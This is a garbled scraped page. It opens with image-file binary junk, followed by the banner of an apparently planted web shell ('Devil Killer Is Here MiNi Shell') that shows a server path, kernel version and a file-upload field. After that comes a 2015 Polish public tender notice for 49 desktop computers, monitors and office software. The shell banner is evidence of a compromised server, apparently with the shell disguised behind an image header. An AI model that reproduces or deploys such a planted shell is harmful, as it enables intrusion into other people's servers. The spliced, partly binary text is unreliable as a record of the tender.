JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151105/297472-N-2015.html

<p class="kh_header"><b>Końskie: Dostawa  środków trwałych w postaci 49-ciu zestawów komputerowych stacjonarnych wraz z oprogramowaniem o okresie użytkowania ponad 1 rok i wartości każdego z nich powyżej 3500 zł brutto (łącznie z podatkiem VAT).</b><br>
<b>Numer ogłoszenia: 297472 - 2015; data zamieszczenia: 05.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Ośrodek Doradztwa Rolniczego , Modliszewice, ul. Piotrkowska 30, 26-200 Końskie, woj. świętokrzyskie, tel. 41 3722284, faks 41 3722286.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.sodr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojewódzka jednostka Samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  środków trwałych w postaci 49-ciu zestawów komputerowych stacjonarnych wraz z oprogramowaniem o okresie użytkowania ponad 1 rok i wartości każdego z nich powyżej 3500 zł brutto (łącznie z podatkiem VAT)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SPECYFIKACJA TECHNICZNA - KOMPUTER STACJONARNY

Lp	Komponent	Wymagane parametry	Szt. 49
1	Typ	Komputer stacjonarny.	
2	Zastosowanie 	Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych i multimedialnych pracujących z oprogramowaniem Microsoft.	
3	Procesor 	Procesor i5-4590 lub równoważny 64 bitowy o architekturze x86, czterordzeniowy osiągający nie mniejszą liczbę 7223 punktów w teście PassMark - CPU Mark.	
4	Płyta główna / porty - 
zabrania się uzyskiwania portów w wyniku stosowania przejściówek, konwerterów itp.

	Zintegrowane z tylnym panelem płyty głównej: 
1 x Audio: wejście liniowe / mikrofon,
1 x Audio: wejście liniowe,
1 x Audio: wyjście liniowe,
2 x USB 3.0,
4 x USB 2.0,
1 x VGA,
1 x Szeregowy (RS-232, 9-pinowe, 16-bajtowe FIFO, kompatybilność z 16550),
1 x Ethernet (RJ-45),
1 x DVI-D,
2 x PS/2 - klawiatura/mysz oddzielnie dla każdego urządzenia.
Zintegrowane na płycie głównej :
2 x USB 3.0,
2 x USB 2.0,
4 x Serial ATA III ( 6 Gbit),
możliwość rozbudowy poprzez wolne złącza minimum:
1 x PCI-Express 3.0 x16,
2 x PCI-Express x1,
1 x PCI-Express 2.0 x4 (mech. x16),
1 x port równoległy (25-pinowy z EPP i ECP) bez konieczności zajmowania jakiegokolwiek portu USB lub slotu PCI-E.
Dostępne z przodu obudowy:
1 x audio: słuchawkowe,
1 x audio: mikrofon,
2 x USB 2.0.
Funkcja zasilania portu USB nawet przy wyłączonym komputerze.
Wsparcie dla Wake up from S5.
Możliwość blokowania portów zewnętrznych, dodatkowo każdy port zewnętrzny USB może być blokowany oddzielnie.
Możliwość blokowania portu równoległego bezpośrednio z poziomu biosu płyty głównej.
Możliwość ustawienia hasła administratora i użytkownika na bios, hasła na dysk twardy.	
5	Obudowa 	Stojąca: MicroTower lub MiniTower.
Na obudowie ma się znajdować nazwa i numer seryjny komputera.
Kolor: zgodny z pozostałymi elementami zestawu.
Wnęki: 
Maksymalnie 1 x zewnętrzna wnęka 3,5-calowa - w tym jedna wolna,
Maksymalnie 2 x wewnętrzna wnęki 3,5-calowe - w tym jedna wolna,
Maksymalnie 2 x zewnętrzne wnęki 5,25-calowe - w tym jedna wolna.
Konstrukcja obudowy musi umożliwiać zastosowanie zabezpieczenia fizycznego w postaci linki metalowej (złącze blokady Kensington) oraz kłódki (oczko w obudowie do założenia kłódki).
Brak stosowania plomb na obudowie.
Konstrukcja przodu obudowy umożliwiająca przepływ powietrza.
Obudowa oznakowana logiem producenta komputera.	
6	Pamięć operacyjna 	Pojemność: min. 1 x 4 GB DDR3 1600Mhz, z możliwością rozbudowy do maksymalnie 32 GB, złącza pamięci: min. 4 szt. 	
7	Karta grafiki 	Zintegrowana, powinna wspierać technologię: DirectX 11.1; Open CL 1.2; OpenGL 4.0.	
8	Parametry pamięci masowej 	Dysk twardy o pojemności min. 500GB, Serial ATA III, 7200 obr./min.
Obsługiwane rodzaje dysków: SATA, SSHD, SSD, SED. 	
9	Wyposażenie multimedialne 	Płyta główna wyposażona w kartę dźwiękową 5.1 oraz zintegrowany głośnik multimedialny zamontowany wewnątrz obudowy.	
10	Ergonomia 	Głośność wg ISO 7779:2010, ECMA-74 w trybie aplikacji biurowych 2.0 z pozycji obserwatora w trybie pracy wynosząca maksymalnie 22 dB. - odpowiednie dokumenty potwierdzające  powyższe wymagania załączyć do oferty. 	
11	Niezawodność/jakość wytwarzania/certyfikaty 	Sprzęt musi być produkowany zgodnie z normami ISO 9001, ISO 14001, RoHS oraz WEEE - odpowiednie dokumenty potwierdzające  powyższe wymagania załączyć do oferty.
Komputer powinien znajdować się na liście zgodności ENERGY STARR 6.0 - odpowiednie dokumenty potwierdzające powyższe wymagania załączyć do oferty.	
12	Zasilacz	Maksymalna moc 280W wydajność energetyczna zasilacza (przy 230 V i obciążeniu 20% / 50% / 100%) : 83% / 86% / 85%.
Wbudowany sprzętowy wyłącznik odcinający całkowicie zasilanie.	
13	Wsparcie techniczne 	Dostęp do aktualnych sterowników zainstalowanych w komputerze urządzeń, realizowany poprzez podanie numeru seryjnego komputera, na dedykowanej przez producenta stronie internetowej - należy podać adres strony oraz sposób realizacji wymagania (opis uzyskania w/w informacji). 	
14	Wymagania dodatkowe

	Nagrywarka DVD+/- RW wraz z oprogramowaniem do nagrywania płyt.
Mysz optyczna: 
kolor - zgodny z pozostałymi elementami zestawu,
kabel min. 1,5m zakończony wtykiem USB/PS2,
trzy przyciski i jedna rolka przewijania,
rozdzielczość 1000 dpi,
oznakowana logiem producenta komputera.
Klawiatura:
kolor: zgodny z pozostałymi elementami zestawu,
kabel min 1,7m zakończony wtykiem PS2, (układ polski programisty),
oznakowana logiem producenta komputera.	
15	Wymiary	Suma szerokości, wysokości, głębokości nie może być
większa niż  955 mm	
16	Waga 	Minimalnie 10 kg	
17	Zainstalowane oprogramowanie - zabrania się stosowania licencji poleasingowych


	System operacyjny: 
Licencja na system operacyjny Microsoft Windows 8.1 Pro PL 64-bit lub nowszy, preinstalowany Windows 7 Pro PL (dołączony nośnik z systemem operacyjnym).
Zainstalowany system operacyjny niewymagający aktywacji za pomocą telefonu lub Internetu w firmie Microsoft. 
Komputer powinien znajdować się na liście zgodności Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Windows 7 i 8.1	
18	Oprogramowanie producenta sprzętu	Dedykowane oprogramowanie producenta sprzętu umożliwiające automatyczną aktualizację sterowników oraz oprogramowania użytkowego producenta w tym również wgranie najnowszej wersji BIOS. Oprogramowanie musi  mieć możliwość zarządzania oprogramowaniem BIOS z jednego, uwierzytelnionego, centralnego miejsca. Oprogramowanie musi mieć możliwość archiwizacji lub aktualizacji BIOS lub pojedynczych ustawień BIOS podczas działania maszyn, bez przerywania pracy. Oprogramowanie musi zapewniać proaktywny monitoring stanu systemu i stanu technicznego komponentów, proaktywne ostrzeżenia, które umożliwiają reagowanie na awarie komponentów, zanim wystąpią.	
19	Gwarancja / serwis	Minimum 24 miesiące z naprawą u Zamawiającego od dnia protokolarnego przekazania.
Serwis urządzeń musi byś realizowany przez producenta lub autoryzowanego partnera serwisowego producenta. 
Bezpłatny serwis gwarancyjny na czas trwania gwarancji.
Firma serwisująca musi posiadać ISO 9001, załączyć certyfikat do oferty.	






SPECYFIKACJA TECHNICZNA - MONITOR 


Lp	Komponent	Wymagane parametry	Szt.
1	Przekątna ekranu  	Minimum  21.5 cala 	49
2	Typ matrycy 	TFT-LCD	
3	Proporcje obrazu 	16:9	
4	Technologia podświetlania	Diody LED	
5	Rozdzielczość 	1920 x 1080 (HD 1080)	
6	Czas reakcji 	Maksimum 5 ms	
7	Jasność 	Minimum 250 cd//m2	
8	Kontrast dynamiczny 	Minimum 1000:1	
9	Kąt widzenia poziomy 	Minimum 170 	
10	Kąt widzenia pionowy  	Minimum 160 	
11	Ilość kolorów 	16,7 mln	
12	Wbudowane głośniki 	Nie	
13	Wbudowany tuner TV 	Nie	
14	Pivot 	Nie	
15	Złącza	1 x VGA
1 x DVI	
16	Inne	Przewód zasilający,  przewód VGA,	
17	Kolor	zgodny z pozostałymi elementami zestawu	
18	Pobór mocy 		Maksymalnie 21 W 	
19	Zasilanie	230 V	
20	Gwarancja/serwis	Minimum 24 miesiące z naprawą u Zamawiającego od dnia protokolarnego przekazania
Bezpłatny serwis gwarancyjny na czas trwania gwarancji	
21	Niezawodność/jakość wytwarzania/certyfikaty 	Sprzęt musi być produkowany zgodnie z normami ISO 9001, ISO 14001 	




SPECYFIKACJA TECHNICZNA - PAKIET BIUROWY

Office Home and Business 2013 Polish PKC  - zabrania się stosowania licencji poleasingowych 
lub równoważny zgodnie z poniższym opisem, spełniający poniższe minimalne wymagania:
1. Być polskojęzyczny, posiadać m.in. edytor tekstu, arkusz kalkulacyjny, program do obsługi poczty elektronicznej, program do tworzenia prezentacji multimedialnych, notatnik pracujący w trybie graficznym.
2. Posiadać możliwość automatycznej instalacji komponentów (przy użyciu instalatora systemowego), możliwość zdalnej instalacji komponentów.
3. Posiadać całkowicie zlokalizowany w języku polskim system komunikatów i podręcznej pomocy technicznej w pakiecie, obsługę języka polskiego w zakresie sprawdzania pisowni i poprawności gramatycznej, autokorektę oraz możliwość prowadzenia dyskusji i subskrypcji dokumentów w sieci z automatycznym powiadomieniem o zmianach w dokumentach.
4. W systemach pocztowych posiadać możliwość delegacji uprawnień do otwierania, drukowania, modyfikowania i czytania załączanych dokumentów i informacji, możliwość blokowania niebezpiecznej lub niechcianej poczty, wsparcie dla formatu XML w podstawowych aplikacjach.
5. Posiadać pełna zgodność dokumentów z formatami .doc, .docx, .dotm .xls i .xlsx, .xltm, .ppt, .pptx, .potx w tym obsługa formatowania, wykonywanie i edycję makr oraz kodu zapisanego w języku Visual Basic for Application oraz możliwość nadawania uprawnień do modyfikacji i formatowania dokumentów lub ich fragmentów. 
 6. Posiadać automatyczne przesyłanie poczty na podstawie reguł, automatyczne odpowiedzi, możliwość dodawania do dokumentów i arkuszy kalkulacyjnych podpisów cyfrowych, pozwalających na stwierdzenie czy dany dokument/arkusz pochodzi z bezpiecznego źródła i nie został w żaden sposób zmieniony.
7. Posiadać możliwość automatycznego odzyskiwania dokumentów i arkuszy kalkulacyjnych w wypadku przypadkowego wyłączenia komputera. Oprogramowanie musi posiadać możliwość centralnego konfigurowania poprzez GPO.
 8. Edytor tekstów musi umożliwiać: 
a. Edycję i formatowanie tekstu w języku polskim wraz z obsługą języka polskiego w zakresie sprawdzania pisowni i poprawności gramatycznej oraz funkcjonalnością słownika wyrazów bliskoznacznych i autokorekty. 
b. Wstawianie oraz formatowanie tabel. 
c. Wstawianie oraz formatowanie obiektów graficznych. 
d. Wstawianie wykresów i tabel z arkusza kalkulacyjnego (wliczając tabele przestawne). 
e. Automatyczne numerowanie rozdziałów, punktów, akapitów, tabel i rysunków. 
f. Automatyczne tworzenie spisów treści. 
g. Formatowanie nagłówków i stopek stron .
h. Sprawdzanie pisowni w języku polskim. 
i. Śledzenie zmian wprowadzonych przez użytkowników 
j. Nagrywanie, tworzenie i edycję makr automatyzujących wykonywanie czynności 
k. Określenie układu strony (pionowa/pozioma) 
l. Wydruk dokumentów 
m. Wykonywanie korespondencji seryjnej bazując na danych adresowych pochodzących z arkusza kalkulacyjnego i z narzędzia do zarządzania informacją prywatną. 
n. Pracę na dokumentach utworzonych przy pomocy Microsoft Word 2003 lub Microsoft Word 2007, 2010 oraz 2013 z zapewnieniem bezproblemowej konwersji wszystkich elementów i atrybutów dokumentu. 
o. Zabezpieczenie dokumentów hasłem przed odczytem oraz przed wprowadzaniem modyfikacji. 
p. Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających wykorzystanie go, jako środowiska udostępniającego formularze bazujące na schematach XML z Centralnego Repozytorium Wzorów Dokumentów Elektronicznych, które po wypełnieniu umożliwiają zapisanie pliku XML w zgodzie z obowiązującym prawem. 
r. Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi (kontrolki) umożliwiających podpisanie podpisem elektronicznym pliku z zapisanym dokumentem przy pomocy certyfikatu kwalifikowanego zgodnie z wymaganiami obowiązującego w Polsce prawa. 
s. Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających wykorzystanie go, jako środowiska udostępniającego formularze i pozwalające zapisać plik wynikowy w zgodzie z Rozporządzeniem o Aktach Normatywnych i Prawnych. 
 9. Arkusz kalkulacyjny musi umożliwiać: 
a. Tworzenie raportów tabelarycznych. 
b. Tworzenie wykresów liniowych (wraz linią trendu), słupkowych, kołowych. 
c. Tworzenie arkuszy kalkulacyjnych zawierających teksty, dane liczbowe oraz formuły przeprowadzające operacje matematyczne, logiczne, tekstowe, statystyczne oraz operacje na danych finansowych i na miarach czasu. 
d. Tworzenie raportów z zewnętrznych źródeł danych (inne arkusze kalkulacyjne, bazy danych zgodne z ODBC, pliki tekstowe, pliki XML, webservice). 
e. Obsługę kostek OLAP oraz tworzenie i edycję kwerend bazodanowych i webowych. Narzędzia wspomagające analizę statystyczną i finansową, analizę wariantową i rozwiązywanie problemów optymalizacyjnych. 
f. Tworzenie raportów tabeli przestawnych umożliwiających dynamiczną zmianę wymiarów oraz wykresów bazujących na danych z tabeli przestawnych. 
g. Wyszukiwanie i zamianę danych. 
h. Wykonywanie analiz danych przy użyciu formatowania warunkowego. 
i. Nazywanie komórek arkusza i odwoływanie się w formułach po takiej nazwie. 
j. Nagrywanie, tworzenie i edycję makr automatyzujących wykonywanie czynności.
k. Formatowanie czasu, daty i wartości finansowych z polskim formatem. 
l. Zapis wielu arkuszy kalkulacyjnych w jednym pliku. 
m. Zachowanie pełnej zgodności z formatami plików utworzonych za pomocą oprogramowania Microsoft Excel 2003, 2007, 2010 oraz 2013 z uwzględnieniem poprawnej realizacji użytych w nich funkcji specjalnych i makropoleceń. 
n. Zabezpieczenie dokumentów hasłem przed odczytem oraz przed wprowadzaniem modyfikacji. 
 10. Narzędzie do przygotowywania i prowadzenia prezentacji musi umożliwiać: 
a. Prezentowanie przy użyciu projektora multimedialnego 
b. Drukowanie w formacie umożliwiającym robienie notatek 
c. Zapisanie jako prezentacja tylko do odczytu. 
d. Nagrywanie narracji i dołączanie jej do prezentacji 
e. Opatrywanie slajdów notatkami dla prezentera 
f. Umieszczanie i formatowanie tekstów, obiektów graficznych, tabel, nagrań dźwiękowych i wideo 
g. Umieszczanie tabel i wykresów pochodzących z arkusza kalkulacyjnego 
h. Odświeżenie wykresu znajdującego się w prezentacji po zmianie danych w źródłowym arkuszu kalkulacyjnym 
i. Możliwość tworzenia animacji obiektów i całych slajdów 
j. Prowadzenie prezentacji w trybie prezentera, gdzie slajdy są widoczne na jednym monitorze lub projektorze, a na drugim widoczne są slajdy i notatki prezentera 
k. Pełna zgodność z formatami plików utworzonych za pomocą oprogramowania MS PowerPoint 2003, MS PowerPoint 2007, 2010, 2013. 
 11. Narzędzie do zarządzania informacją prywatną (pocztą elektroniczną, kalendarzem, kontaktami i zadaniami) musi umożliwiać: 
a. Pobieranie i wysyłanie poczty elektronicznej z serwera pocztowego. 
b. Filtrowanie niechcianej poczty elektronicznej (SPAM) oraz określanie listy zablokowanych i bezpiecznych nadawców. 
c. Tworzenie katalogów, pozwalających katalogować pocztę elektroniczną. 
d. Automatyczne grupowanie poczty o tym samym tytule .
e. Tworzenie reguł przenoszących automatycznie nową pocztę elektroniczną do określonych katalogów bazując na słowach zawartych w tytule, adresie nadawcy i odbiorcy. 
f. Oflagowanie poczty elektronicznej z określeniem terminu przypomnienia. 
g. Zarządzanie kalendarzem. 
h. Udostępnianie kalendarza innym użytkownikom. 
i. Przeglądanie kalendarza innych użytkowników .
j. Zapraszanie uczestników na spotkanie, co po ich akceptacji powoduje automatyczne wprowadzenie spotkania w ich kalendarzach. 
k. Zarządzanie listą zadań. 
l. Zlecanie zadań innym użytkownikom. 
n. Udostępnianie listy kontaktów innym użytkownikom. 
o. Przeglądanie listy kontaktów innych użytkowników. 
p. Możliwość przesyłania kontaktów innym użytkowników. 
r. współpraca z systemem MS Exchange, w tym odbiór poczty, możliwość udostępniania poczty dla innych użytkowników..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 48.90.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wpłacenia wadium w wysokości 5000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy

nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego z powodu przesłanek, określonych w art 24 ust 1ustawy oraz art 24b ust  3 ustawy
spełniają warunki określone w art 22 ust 1 ustawy, tj
 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art 22 ust 1 pkt 1 ustawy)
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
posiadają wiedzę i doświadczenie niezbędne  do wykonania zamówienia (art 22 ust 1 pkt 2 ustawy)
Wykonawca winien wykazać się wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, minimum dwóch dostaw tożsamych z przedmiotem zamówienia o wartości minimum 190000 PLN brutto każda z dostaw. 
 dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia (art 22 ust 1 pkt 3 ustawy)
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art 22 ust 1 pkt 4 ustawy)
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Wykonawca może polegać na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia
Ocena spełnienia warunków uczestnictwa w postępowaniu zostanie dokonana metodą spełnia  nie spełnia w oparciu o dokumenty, oświadczenia i informacje wymagane w Rozdziale VI, a zawarte w złożonej przez Wykonawcę ofercie. Z treści załączonych dokumentów musi jednoznacznie wynikać, że stawiane warunki Wykonawca spełnił. 
Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy z tym że  parametry wbudowanych części muszą być ze sobą zgodne.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum dwóch dostaw tożsamych z przedmiotem zamówienia o wartości minimum 190000 PLN brutto każda z dostaw.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
